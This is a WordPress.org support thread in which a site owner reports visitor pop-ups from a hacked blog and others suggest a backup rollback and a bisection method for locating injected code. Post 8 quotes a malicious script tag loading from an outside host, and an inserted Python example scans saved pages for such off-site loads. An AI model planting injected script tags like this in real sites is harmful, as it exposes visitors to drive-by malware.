WordPress.org

Possible Virus? Users are getting a pop-up porn message (11 posts)

  1. vuhoops
    Member
    Posted 2 years ago #

    I think I'm running the most recent version of WP (3.2.1), but folks are complaining of a pop-up porn issue on VUhoops.com.

    And I am completely unable to recreate the issue.

    All issues relating to the topic are 5+ years old. Is there a more recent suggestion that I should look at? Or any suggestions at all?

    Many thanks in advance.

  2. vuhoops
    Member
    Posted 2 years ago #

    Crud, now my site is simply forwarding to http://vuhoops.com/wp-admin/install.php

  3. FittingSites
    Member
    Posted 2 years ago #

    Yes, it's compromised. If you have host access, I'd take it down immediately. Also, test it here. I did, and it shows malware in your javascript.

    Do you have a backup you can restore from? A backup of both the files and the database. It's often easier to "roll the clock back" to a clean copy of your site.

    Also, good idea, for anyone else here, to NOT click on the link above or visit vuhoops.com

  4. vuhoops
    Member
    Posted 2 years ago #

    Thank you Fitting sites. I'm afraid I am way in over my head now. :(

  5. esmi
    Forum Moderator
    Posted 2 years ago #

  6. vuhoops
    Member
    Posted 2 years ago #

    Ok, so I've actually gone w/ a complete new installation and new db. and restored my posts.

    But users are still reporting the issue. Any ideas at this point???

    I hope that my activity from the past few years shows I'm not trying to draw people to my site to spread anything but simply to ask for help at this point.

  7. Sabinou
    Member
    Posted 2 years ago #

    There's a solution, if some of your visitors are nerdy enough to do the test for you, you can find from where the call to the problematic content is coming.

    I wrote this for my blog, I'll copy-paste, just removing the name of my blog :

    - first, open the blog and get the virus warning.

    - then ask your browser to give you the source code of the website.

    - then open your favorite text editor (not Word, a simple text manager, like Notepad or Notepad++ for MS-Windows OSes), create a new text file, and paste inside it the source code you just obtained

    - save that file as 1.html to a folder on your hard disk

    - to make sure, open 1.html inside your browser : it should open a weird copy of the blog, and also trigger the virus warning

    *** Now we’ll track which part of the source code calls for the virus ! ***

    - with copy, cut and paste, create a new text file with the first half of the code of your 1.html file, and another new file with the second half of the code of 1.html. Save them as 2.html and 3.html

    - Open 2.html in your browser, if it doesn’t trigger the virus warning, then it’s 3.html that should trigger it. If none of them triggers it, hit F5 with each of the pages a few times. You should find which of these two files will trigger the virus warning.

    - And then again, you divide the culprit file in two halves (for instance 2a and 2b.html), and so on, and so on, until you have a very small html file responsible for the virus warning !

    - ideally, that final virus-causing file should contain just a few lines of code, allowing to see precisely what item within the website is calling for a virus attack

  8. vuhoops
    Member
    Posted 2 years ago #

    the XMLRPC is yielding this if it helps...

    XML-RPC server accepts POST requests only.<script src="http://sweepstakesandcontestsinfo.com/js.php?s=1"></script>
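
A static complement to the halving procedure in post 7, run here on the response quoted in post 8 (added example, not code from any poster in this thread): it lists the tags in a saved page that load active content from a host other than the site's own. The function name, the tag list and the `blog.example` / `video.example` sample page are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags that pull in active content, and the attribute holding the URL (assumed list).
RESOURCE_ATTRS = {"script": "src", "iframe": "src", "embed": "src", "object": "data"}

class ExternalLoadFinder(HTMLParser):
    def __init__(self, site_host, allowed_hosts=()):
        super().__init__()
        self.trusted = [site_host.lower()] + [h.lower() for h in allowed_hosts]
        self.findings = []

    def is_trusted(self, host):
        # Exact match or a subdomain of a trusted host (www.blog.example -> blog.example).
        return any(host == t or host.endswith("." + t) for t in self.trusted)

    def handle_starttag(self, tag, attrs):
        url = dict(attrs).get(RESOURCE_ATTRS.get(tag, ""))
        if not url:
            return
        # Relative URLs have no hostname and stay on the site; "//host/x" is parsed too.
        host = (urlparse(url).hostname or "").lower()
        if host and not self.is_trusted(host):
            self.findings.append((self.getpos()[0], tag, host, url))

def find_external_loads(html, site_host, allowed_hosts=()):
    """Return (line, tag, host, url) for every off-site active-content load."""
    finder = ExternalLoadFinder(site_host, allowed_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample of a clean page (not from the thread).
SAMPLE_PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="http://www.blog.example/js/site.js"></script>
</head><body><p>Post text</p>
<iframe src="//video.example/embed/1"></iframe>
</body></html>"""

# The xmlrpc.php response exactly as quoted in post 8.
SAMPLE_XMLRPC = ('XML-RPC server accepts POST requests only.'
                 '<script src="http://sweepstakesandcontestsinfo.com/js.php?s=1"></script>')

if __name__ == "__main__":
    for line, tag, host, url in find_external_loads(SAMPLE_XMLRPC, "vuhoops.com"):
        print(f"line {line}: <{tag}> loads from {host}: {url}")
```

Run it on the source saved from a browser that showed the pop-up, since injected tags like this are sometimes served only to some visitors.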

  9. FittingSites
    Member
    Posted 2 years ago #

    @vuhoops - The process of restoring from backup is complicated enough to require a fair amount of confidence and expertise, so if you are not technically-minded, don't muck about; have someone help you with this.

    I recommend you contact your hosting provider and ask them to roll you back to a date that is prior to being hacked. Most web hosts will do this for you (they may charge, but it's worth it in this instance) so you don't have to worry about being in over your head.

    Bottom line: You need to fix this ASAP, and if you can't do so right away, take the site down for maintenance. As we speak, your site is causing visitors' computers to be open to god knows what kinds of attacks.

  10. vuhoops
    Member
    Posted 2 years ago #

    I just wanted to thank everyone for their help and support. I was able to roll the site back, so I think we're better.

    Thanks again.

  11. FittingSites
    Member
    Posted 2 years ago #

    +1

Topic Closed

This topic has been closed to new replies.
